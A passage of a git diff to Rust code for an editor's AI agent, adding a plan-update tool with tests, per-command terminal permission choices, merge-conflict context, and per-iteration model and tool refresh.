fake_model = model.as_fake(); + + let mut events = thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["Make a plan"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + let input = json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + "priority": "high" + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + "priority": "low" + } + ] + }); + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "plan_1".into(), + name: UpdatePlanTool::NAME.into(), + raw_input: input.to_string(), + input, + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model.end_last_completion_stream(); + cx.run_until_parked(); + + let tool_call = expect_tool_call(&mut events).await; + assert_eq!( + tool_call, + acp::ToolCall::new("plan_1", "Update plan") + .kind(acp::ToolKind::Think) + .raw_input(json!({ + "plan": [ + { + "step": "Inspect the code", + "status": "completed", + "priority": "high" + }, + { + "step": "Implement the tool", + "status": "in_progress" + }, + { + "step": "Run tests", + "status": "pending", + "priority": "low" + } + ] + })) + .meta(acp::Meta::from_iter([( + "tool_name".into(), + "update_plan".into() + )])) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new().status(acp::ToolCallStatus::InProgress) + ) + ); + + let plan = expect_plan(&mut events).await; + assert_eq!( + plan, + acp::Plan::new(vec![ + acp::PlanEntry::new( + "Inspect the code", + acp::PlanEntryPriority::High, + acp::PlanEntryStatus::Completed, + ), + acp::PlanEntry::new( + "Implement the tool", + acp::PlanEntryPriority::Medium, + acp::PlanEntryStatus::InProgress, + ), + acp::PlanEntry::new( + "Run tests", + acp::PlanEntryPriority::Low, + acp::PlanEntryStatus::Pending, + ), + ]) + ); + + let update = expect_tool_call_update_fields(&mut events).await; + assert_eq!( + update, + acp::ToolCallUpdate::new( + "plan_1", + acp::ToolCallUpdateFields::new() + .status(acp::ToolCallStatus::Completed) + .raw_output("Plan updated") + ) + ); +} + #[gpui::test] async fn test_send_no_retry_on_success(cx: &mut TestAppContext) { let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await; @@ -3770,6 +3965,7 @@ async fn setup(cx: &mut TestAppContext, model: TestModel) -> ThreadTest { StreamingEchoTool::NAME: true, StreamingFailingEchoTool::NAME: true, TerminalTool::NAME: true, + UpdatePlanTool::NAME: true, } } } @@ -4388,23 +4584,16 @@ async fn test_subagent_tool_call_end_to_end(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4530,23 +4719,16 @@ async fn test_subagent_tool_output_does_not_include_thinking(cx: &mut TestAppCon .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4685,23 +4867,16 @@ async fn test_subagent_tool_call_cancellation_during_task_prompt(cx: &mut TestAp .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4822,23 +4997,16 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -4987,48 +5155,6 @@ async fn test_subagent_tool_resume_session(cx: &mut TestAppContext) { ); } -#[gpui::test] -async fn test_subagent_tool_is_present_when_feature_flag_enabled(cx: &mut TestAppContext) { - init_test(cx); - - cx.update(|cx| { - cx.update_flags(true, vec!["subagents".to_string()]); - }); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/test"), json!({})).await; - let project = Project::test(fs, [path!("/test").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - - let environment = Rc::new(cx.update(|cx| { - FakeThreadEnvironment::default().with_terminal(FakeTerminalHandle::new_never_exits(cx)) - })); - - let thread = cx.new(|cx| { - let mut thread = Thread::new( - project.clone(), - project_context, - context_server_registry, - Templates::new(), - Some(model), - cx, - ); - thread.add_default_tools(environment, cx); - thread - }); - - thread.read_with(cx, |thread, _| { - assert!( - thread.has_registered_tool(SpawnAgentTool::NAME), - "subagent tool should be present when feature flag is enabled" - ); - }); -} - #[gpui::test] async fn test_subagent_thread_inherits_parent_thread_properties(cx: &mut TestAppContext) { init_test(cx); @@ -5201,23 +5327,16 @@ async fn test_subagent_context_window_warning(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5334,23 +5453,16 @@ async fn test_subagent_no_context_window_warning_when_already_at_warning(cx: &mu .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -5515,23 +5627,16 @@ async fn test_subagent_error_propagation(cx: &mut TestAppContext) { .await; let project = Project::test(fs.clone(), [path!("/a").as_ref()], cx).await; let thread_store = cx.new(|cx| ThreadStore::new(cx)); - let agent = NativeAgent::new( - project.clone(), - thread_store.clone(), - Templates::new(), - None, - fs.clone(), - &mut cx.to_async(), - ) - .await - .unwrap(); + let agent = cx.update(|cx| { + NativeAgent::new(thread_store.clone(), Templates::new(), None, fs.clone(), cx) + }); let connection = Rc::new(NativeAgentConnection(agent.clone())); let acp_thread = cx .update(|cx| { connection .clone() - .new_session(project.clone(), Path::new(""), cx) + .new_session(project.clone(), PathList::new(&[Path::new("")]), cx) }) .await .unwrap(); @@ -6529,3 +6634,110 @@ async fn test_streaming_tool_error_waits_for_prior_tools_to_complete(cx: &mut Te ] ); } + +#[gpui::test] +async fn test_mid_turn_model_and_settings_refresh(cx: &mut TestAppContext) { + let ThreadTest { + model, thread, fs, .. + } = setup(cx, TestModel::Fake).await; + let fake_model_a = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(EchoTool); + thread.add_tool(DelayTool); + }); + + // Set up two profiles: profile-a has both tools, profile-b has only DelayTool. + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "profiles": { + "profile-a": { + "name": "Profile A", + "tools": { + EchoTool::NAME: true, + DelayTool::NAME: true, + } + }, + "profile-b": { + "name": "Profile B", + "tools": { + DelayTool::NAME: true, + } + } + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + cx.run_until_parked(); + + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-a".into()), cx); + thread.set_thinking_enabled(false, cx); + }); + + // Send a message — first iteration starts with model A, profile-a, thinking off. + thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["test mid-turn refresh"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + // Verify first request has both tools and thinking disabled. + let completions = fake_model_a.pending_completions(); + assert_eq!(completions.len(), 1); + let first_tools = tool_names_for_completion(&completions[0]); + assert_eq!(first_tools, vec![DelayTool::NAME, EchoTool::NAME]); + assert!(!completions[0].thinking_allowed); + + // Model A responds with an echo tool call. + fake_model_a.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "tool_1".into(), + name: "echo".into(), + raw_input: r#"{"text":"hello"}"#.into(), + input: json!({"text": "hello"}), + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model_a.end_last_completion_stream(); + + // Before the next iteration runs, switch to profile-b (only DelayTool), + // swap in a new model, and enable thinking. + let fake_model_b = Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "model-b", + "Model B", + true, + )); + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-b".into()), cx); + thread.set_model(fake_model_b.clone() as Arc, cx); + thread.set_thinking_enabled(true, cx); + }); + + // Run until parked — processes the echo tool call, loops back, picks up + // the new model/profile/thinking, and makes a second request to model B. + cx.run_until_parked(); + + // The second request should have gone to model B. + let model_b_completions = fake_model_b.pending_completions(); + assert_eq!( + model_b_completions.len(), + 1, + "second request should go to model B" + ); + + // Profile-b only has DelayTool, so echo should be gone. + let second_tools = tool_names_for_completion(&model_b_completions[0]); + assert_eq!(second_tools, vec![DelayTool::NAME]); + + // Thinking should now be enabled. + assert!(model_b_completions[0].thinking_allowed); +} diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index e61a395e71f93d49d63d378355c89e44359db835..39f5a9df902744875a9faaa1651d65842c1dbf11 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -3,17 +3,18 @@ use crate::{ DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool, - SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, WebSearchTool, - decide_permission_from_settings, + SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, + UpdatePlanTool, WebSearchTool, decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; -use feature_flags::{FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag}; +use feature_flags::{ + FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag, +}; use agent_client_protocol as acp; use agent_settings::{ - AgentProfileId, AgentProfileSettings, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, - SUMMARIZE_THREAD_PROMPT, + AgentProfileId, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, SUMMARIZE_THREAD_PROMPT, }; use anyhow::{Context as _, Result, anyhow}; use chrono::{DateTime, Utc}; @@ -219,6 +220,7 @@ impl UserMessage { "\nThe user has specified the following rules that should be applied:\n"; const OPEN_DIAGNOSTICS_TAG: &str = ""; const OPEN_DIFFS_TAG: &str = ""; + const MERGE_CONFLICT_TAG: &str = ""; let mut file_context = OPEN_FILES_TAG.to_string(); let mut directory_context = OPEN_DIRECTORIES_TAG.to_string(); @@ -229,6 +231,7 @@ impl UserMessage { let mut rules_context = OPEN_RULES_TAG.to_string(); let mut diagnostics_context = OPEN_DIAGNOSTICS_TAG.to_string(); let mut diffs_context = OPEN_DIFFS_TAG.to_string(); + let mut merge_conflict_context = MERGE_CONFLICT_TAG.to_string(); for chunk in &self.content { let chunk = match chunk { @@ -336,6 +339,18 @@ impl UserMessage { ) .ok(); } + MentionUri::MergeConflict { file_path } => { + write!( + &mut merge_conflict_context, + "\nMerge conflict in {}:\n{}", + file_path, + MarkdownCodeBlock { + tag: "diff", + text: content + } + ) + .ok(); + } } language_model::MessageContent::Text(uri.as_link().to_string()) @@ -410,6 +425,13 @@ impl UserMessage { .push(language_model::MessageContent::Text(diagnostics_context)); } + if merge_conflict_context.len() > MERGE_CONFLICT_TAG.len() { + merge_conflict_context.push_str("\n"); + message + .content + .push(language_model::MessageContent::Text(merge_conflict_context)); + } + if message.content.len() > len_before_context { message.content.insert( len_before_context, @@ -641,6 +663,7 @@ pub enum ThreadEvent { AgentThinking(String), ToolCall(acp::ToolCall), ToolCallUpdate(acp_thread::ToolCallUpdate), + Plan(acp::Plan), ToolCallAuthorization(ToolCallAuthorization), SubagentSpawned(acp::SessionId), Retry(acp_thread::RetryStatus), @@ -738,6 +761,48 @@ impl ToolPermissionContext { true }; + // For terminal commands with multiple pipeline commands, use DropdownWithPatterns + // to let users individually select which command patterns to always allow. + if tool_name == TerminalTool::NAME && shell_supports_always_allow { + if let Some(input) = input_values.first() { + let all_patterns = extract_all_terminal_patterns(input); + if all_patterns.len() > 1 { + let mut choices = Vec::new(); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_allow:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::AllowAlways, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_deny:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::RejectAlways, + ), + sub_patterns: vec![], + }); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new("allow"), + "Only this time", + acp::PermissionOptionKind::AllowOnce, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new("deny"), + "Only this time", + acp::PermissionOptionKind::RejectOnce, + ), + sub_patterns: vec![], + }); + return acp_thread::PermissionOptions::DropdownWithPatterns { + choices, + patterns: all_patterns, + tool_name: tool_name.clone(), + }; + } + } + } + let extract_for_value = |value: &str| -> (Option, Option) { if tool_name == TerminalTool::NAME { ( @@ -786,20 +851,22 @@ impl ToolPermissionContext { let mut choices = Vec::new(); - let mut push_choice = |label: String, allow_id, deny_id, allow_kind, deny_kind| { - choices.push(acp_thread::PermissionOptionChoice { - allow: acp::PermissionOption::new( - acp::PermissionOptionId::new(allow_id), - label.clone(), - allow_kind, - ), - deny: acp::PermissionOption::new( - acp::PermissionOptionId::new(deny_id), - label, - deny_kind, - ), - }); - }; + let mut push_choice = + |label: String, allow_id, deny_id, allow_kind, deny_kind, sub_patterns: Vec| { + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(allow_id), + label.clone(), + allow_kind, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(deny_id), + label, + deny_kind, + ), + sub_patterns, + }); + }; if shell_supports_always_allow { push_choice( @@ -808,6 +875,7 @@ impl ToolPermissionContext { format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![], ); if let (Some(pattern), Some(display)) = (pattern, pattern_display) { @@ -818,10 +886,11 @@ impl ToolPermissionContext { }; push_choice( button_text, - format!("always_allow_pattern:{}\n{}", tool_name, pattern), - format!("always_deny_pattern:{}\n{}", tool_name, pattern), + format!("always_allow:{}", tool_name), + format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![pattern], ); } } @@ -832,6 +901,7 @@ impl ToolPermissionContext { "deny".to_string(), acp::PermissionOptionKind::AllowOnce, acp::PermissionOptionKind::RejectOnce, + vec![], ); acp_thread::PermissionOptions::Dropdown(choices) @@ -842,7 +912,7 @@ impl ToolPermissionContext { pub struct ToolCallAuthorization { pub tool_call: acp::ToolCallUpdate, pub options: acp_thread::PermissionOptions, - pub response: oneshot::Sender, + pub response: oneshot::Sender, pub context: Option, } @@ -1242,7 +1312,7 @@ impl Thread { pub fn to_db(&self, cx: &App) -> Task { let initial_project_snapshot = self.initial_project_snapshot.clone(); let mut thread = DbThread { - title: self.title(), + title: self.title().unwrap_or_default(), messages: self.messages.clone(), updated_at: self.updated_at, detailed_summary: self.summary.clone(), @@ -1462,6 +1532,9 @@ impl Thread { self.add_tool(MovePathTool::new(self.project.clone())); self.add_tool(NowTool); self.add_tool(OpenTool::new(self.project.clone())); + if cx.has_flag::() { + self.add_tool(UpdatePlanTool); + } self.add_tool(ReadFileTool::new( self.project.clone(), self.action_log.clone(), @@ -1750,11 +1823,6 @@ impl Thread { self.flush_pending_message(cx); self.cancel(cx).detach(); - let model = self.model.clone().context("No language model configured")?; - let profile = AgentSettings::get_global(cx) - .profiles - .get(&self.profile_id) - .context("Profile not found")?; let (events_tx, events_rx) = mpsc::unbounded::>(); let event_stream = ThreadEventStream(events_tx); let message_ix = self.messages.len().saturating_sub(1); @@ -1762,20 +1830,15 @@ impl Thread { let (cancellation_tx, mut cancellation_rx) = watch::channel(false); self.running_turn = Some(RunningTurn { event_stream: event_stream.clone(), - tools: self.enabled_tools(profile, &model, cx), + tools: self.enabled_tools(cx), cancellation_tx, streaming_tool_inputs: HashMap::default(), _task: cx.spawn(async move |this, cx| { log::debug!("Starting agent turn execution"); - let turn_result = Self::run_turn_internal( - &this, - model, - &event_stream, - cancellation_rx.clone(), - cx, - ) - .await; + let turn_result = + Self::run_turn_internal(&this, &event_stream, cancellation_rx.clone(), cx) + .await; // Check if we were cancelled - if so, cancel() already took running_turn // and we shouldn't touch it (it might be a NEW turn now) @@ -1817,7 +1880,6 @@ impl Thread { async fn run_turn_internal( this: &WeakEntity, - model: Arc, event_stream: &ThreadEventStream, mut cancellation_rx: watch::Receiver, cx: &mut AsyncApp, @@ -1825,8 +1887,15 @@ impl Thread { let mut attempt = 0; let mut intent = CompletionIntent::UserPrompt; loop { - let request = - this.update(cx, |this, cx| this.build_completion_request(intent, cx))??; + // Re-read the model and refresh tools on each iteration so that + // mid-turn changes (e.g. the user switches model, toggles tools, + // or changes profile) take effect between tool-call rounds. + let (model, request) = this.update(cx, |this, cx| { + let model = this.model.clone().context("No language model configured")?; + this.refresh_turn_tools(cx); + let request = this.build_completion_request(intent, cx)?; + anyhow::Ok((model, request)) + })??; telemetry::event!( "Agent Thread Completion", @@ -2422,8 +2491,8 @@ impl Thread { } } - pub fn title(&self) -> SharedString { - self.title.clone().unwrap_or("New Thread".into()) + pub fn title(&self) -> Option { + self.title.clone() } pub fn is_generating_summary(&self) -> bool { @@ -2549,6 +2618,14 @@ impl Thread { .is_some() { _ = this.update(cx, |this, cx| this.set_title(title.into(), cx)); + } else { + // Emit TitleUpdated even on failure so that the propagation + // chain (agent::Thread → NativeAgent → AcpThread) fires and + // clears any provisional title that was set before the turn. + _ = this.update(cx, |_, cx| { + cx.emit(TitleUpdated); + cx.notify(); + }); } _ = this.update(cx, |this, _| this.pending_title_generation = None); })); @@ -2671,12 +2748,13 @@ impl Thread { Ok(request) } - fn enabled_tools( - &self, - profile: &AgentProfileSettings, - model: &Arc, - cx: &App, - ) -> BTreeMap> { + fn enabled_tools(&self, cx: &App) -> BTreeMap> { + let Some(model) = self.model.as_ref() else { + return BTreeMap::new(); + }; + let Some(profile) = AgentSettings::get_global(cx).profiles.get(&self.profile_id) else { + return BTreeMap::new(); + }; fn truncate(tool_name: &SharedString) -> SharedString { if tool_name.len() > MAX_TOOL_NAME_LENGTH { let mut truncated = tool_name.to_string(); @@ -2757,6 +2835,13 @@ impl Thread { tools } + fn refresh_turn_tools(&mut self, cx: &App) { + let tools = self.enabled_tools(cx); + if let Some(turn) = self.running_turn.as_mut() { + turn.tools = tools; + } + } + fn tool(&self, name: &str) -> Option> { self.running_turn.as_ref()?.tools.get(name).cloned() } @@ -3000,7 +3085,8 @@ struct RunningTurn { /// The current event stream for the running turn. Used to report a final /// cancellation event if we cancel the turn. event_stream: ThreadEventStream, - /// The tools that were enabled for this turn. + /// The tools that are enabled for the current iteration of the turn. + /// Refreshed at the start of each iteration via `refresh_turn_tools`. tools: BTreeMap>, /// Sender to signal tool cancellation. When cancel is called, this is /// set to true so all tools can detect user-initiated cancellation. @@ -3396,6 +3482,10 @@ impl ThreadEventStream { .ok(); } + fn send_plan(&self, plan: acp::Plan) { + self.0.unbounded_send(Ok(ThreadEvent::Plan(plan))).ok(); + } + fn send_retry(&self, status: acp_thread::RetryStatus) { self.0.unbounded_send(Ok(ThreadEvent::Retry(status))).ok(); } @@ -3531,6 +3621,10 @@ impl ToolCallEventStream { .ok(); } + pub fn update_plan(&self, plan: acp::Plan) { + self.stream.send_plan(plan); + } + /// Authorize a third-party tool (e.g., MCP tool from a context server). /// /// Unlike built-in tools, third-party tools don't support pattern-based permissions. @@ -3584,6 +3678,7 @@ impl ToolCallEventStream { format!("Always for {} MCP tool", display_name), acp::PermissionOptionKind::RejectAlways, ), + sub_patterns: vec![], }, acp_thread::PermissionOptionChoice { allow: acp::PermissionOption::new( @@ -3596,6 +3691,7 @@ impl ToolCallEventStream { "Only this time", acp::PermissionOptionKind::RejectOnce, ), + sub_patterns: vec![], }, ]), response: response_tx, @@ -3611,40 +3707,13 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - if response_str == format!("always_allow_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); - } - if response_str == format!("always_deny_mcp:{}", tool_id) { - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool_id, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } - - if response_str == "allow" { - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } - - Err(anyhow!("Permission to run tool denied by user")) }) } @@ -3654,8 +3723,6 @@ impl ToolCallEventStream { context: ToolPermissionContext, cx: &mut App, ) -> Task> { - use settings::ToolPermissionMode; - let options = context.build_permission_options(); let (response_tx, response_rx) = oneshot::channel(); @@ -3682,90 +3749,118 @@ impl ToolCallEventStream { let fs = self.fs.clone(); cx.spawn(async move |cx| { - let response_str = response_rx.await?.0.to_string(); - - // Handle "always allow tool" - e.g., "always_allow:terminal" - if let Some(tool) = response_str.strip_prefix("always_allow:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Allow); - }); - }); - } - return Ok(()); + let outcome = response_rx.await?; + let is_allow = Self::persist_permission_outcome(&outcome, fs, &cx); + if is_allow { + Ok(()) + } else { + Err(anyhow!("Permission to run tool denied by user")) } + }) + } - // Handle "always deny tool" - e.g., "always_deny:terminal" - if let Some(tool) = response_str.strip_prefix("always_deny:") { - if let Some(fs) = fs.clone() { - let tool = tool.to_string(); - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .set_tool_default_permission(&tool, ToolPermissionMode::Deny); - }); - }); - } - return Err(anyhow!("Permission to run tool denied by user")); - } + /// Interprets a `SelectedPermissionOutcome` and persists any settings changes. + /// Returns `true` if the tool call should be allowed, `false` if denied. + fn persist_permission_outcome( + outcome: &acp_thread::SelectedPermissionOutcome, + fs: Option>, + cx: &AsyncApp, + ) -> bool { + let option_id = outcome.option_id.0.as_ref(); + + let always_permission = option_id + .strip_prefix("always_allow:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + .or_else(|| { + option_id + .strip_prefix("always_deny:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }) + .or_else(|| { + option_id + .strip_prefix("always_allow_mcp:") + .map(|tool| (tool, ToolPermissionMode::Allow)) + }) + .or_else(|| { + option_id + .strip_prefix("always_deny_mcp:") + .map(|tool| (tool, ToolPermissionMode::Deny)) + }); - // Handle "always allow pattern" - e.g., "always_allow_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_allow_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .add_tool_allow_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always allow pattern: missing newline separator in '{rest}'"); - } - return Ok(()); - } + if let Some((tool, mode)) = always_permission { + let params = outcome.params.as_ref(); + Self::persist_always_permission(tool, mode, params, fs, cx); + return mode == ToolPermissionMode::Allow; + } - // Handle "always deny pattern" - e.g., "always_deny_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_deny_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - .get_or_insert_default() - .add_tool_deny_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always deny pattern: missing newline separator in '{rest}'"); - } - return Err(anyhow!("Permission to run tool denied by user")); - } + // Handle simple "allow" / "deny" (once, no persistence) + if option_id == "allow" || option_id == "deny" { + debug_assert!( + outcome.params.is_none(), + "unexpected params for once-only permission" + ); + return option_id == "allow"; + } - // Handle simple "allow" (allow once) - if response_str == "allow" { - return Ok(()); - } + debug_assert!(false, "unexpected permission option_id: {option_id}"); + false + } - // Handle simple "deny" (deny once) - Err(anyhow!("Permission to run tool denied by user")) - }) + /// Persists an "always allow" or "always deny" permission, using sub_patterns + /// from params when present. + fn persist_always_permission( + tool: &str, + mode: ToolPermissionMode, + params: Option<&acp_thread::SelectedPermissionParams>, + fs: Option>, + cx: &AsyncApp, + ) { + let Some(fs) = fs else { + return; + }; + + match params { + Some(acp_thread::SelectedPermissionParams::Terminal { + patterns: sub_patterns, + }) => { + debug_assert!( + !sub_patterns.is_empty(), + "empty sub_patterns for tool {tool} — callers should pass None instead" + ); + let tool = tool.to_string(); + let sub_patterns = sub_patterns.clone(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + let agent = settings.agent.get_or_insert_default(); + for pattern in sub_patterns { + match mode { + ToolPermissionMode::Allow => { + agent.add_tool_allow_pattern(&tool, pattern); + } + ToolPermissionMode::Deny => { + agent.add_tool_deny_pattern(&tool, pattern); + } + // If there's no matching pattern this will + // default to confirm, so falling through is + // fine here. + ToolPermissionMode::Confirm => (), + } + } + }); + }); + } + None => { + let tool = tool.to_string(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + settings + .agent + .get_or_insert_default() + .set_tool_default_permission(&tool, mode); + }); + }); + } + } } } @@ -3818,6 +3913,15 @@ impl ToolCallEventStreamReceiver { panic!("Expected terminal but got: {:?}", event); } } + + pub async fn expect_plan(&mut self) -> acp::Plan { + let event = self.0.next().await; + if let Some(Ok(ThreadEvent::Plan(plan))) = event { + plan + } else { + panic!("Expected plan but got: {:?}", event); + } + } } #[cfg(any(test, feature = "test-support"))] diff --git a/crates/agent/src/thread_store.rs b/crates/agent/src/thread_store.rs index dd1f650de2f59a0e681e15e7eae3fad1a49ccc41..379ae675d4bbf3c2a9570365493317178f38a804 100644 --- a/crates/agent/src/thread_store.rs +++ b/crates/agent/src/thread_store.rs @@ -2,7 +2,6 @@ use crate::{DbThread, DbThreadMetadata, ThreadsDatabase}; use agent_client_protocol as acp; use anyhow::{Result, 